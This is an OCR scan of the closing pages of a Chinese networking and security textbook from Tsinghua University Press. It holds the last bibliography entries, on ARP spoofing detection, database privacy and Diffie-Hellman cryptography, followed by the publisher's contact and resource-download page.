[22] 李 启 南 . 基于 FARIMA 的 ARP 欺骗 入 侵 检测 [中]. 计算 机 工程 ,2011,37(2) : 139-140. 

[23] 吴 辰 文 , 王 铁 君 , 李 晓 军 ,等 . 现代 计算 机 网 络 LM]. 北京 : 清华 大 学 出 版 社 ,2011. 

[24] 周 水 庚 , 李 丰 , 陶 宇 飞 , 等 . 面向 数据 库 应 用 的 隐私 保护 研究 综述 [J]. 计算 机 学 报 . 2009，32(5) 
847-861. 

[25] Diffie W, Hellman M E. New directions in cryptography[J]. IEEE Transactions on Information 
Theory, 1976, 22(6): 644-654. 


图 书 资源 支持 

















感谢 您 


提供 配套 的 资源 ,有 需求 的 读者 请 扫描 下 方 的 “ 书 圈 " 微 




















义 来 对 清华 版 图 书 的 支持 和 爱护 。 为 了 配合 本 书 的 使 用 ,本 书 









































一 


言 公众 号 二 维 码 ,在 图 

















书 专区 下 载 , 也 可 以 拨打 电话 或 发 送 电子 邮件 咨询 。 

















如 果 您 在 使 用 本 书 的 过 程 中 遇 到 了 什么 问题 ,或 者 有 相关 图 书 出 版 计划 ， 


也 请 您 发 邮件 告 




















诉 我 们 ,以 便 我 们 更 好 地 为 您 服务 


我 们 的 联系 方式 : 


地 址 : 
邮 编 : 








电 话 : 
资源 下 载 : 


电子 邮件 : 


北京 海淀 区 双 清 路 学 研 大 厦 A 座 707 


100084 a Dn ho 





010 一 62770175 一 4604 


http://www. tup. com. cn 





weijj@tup. tsinghua. edu. cn 


QQ: 883604( 请 写 明 您 的 单位 和 姓名 ) 


用 微 信 扫 一 


扫 右 边 的 二 维 码 , 即 可 关注 清华 大 学 出 版 社 公 众 号 “ 书 圈 ”。 


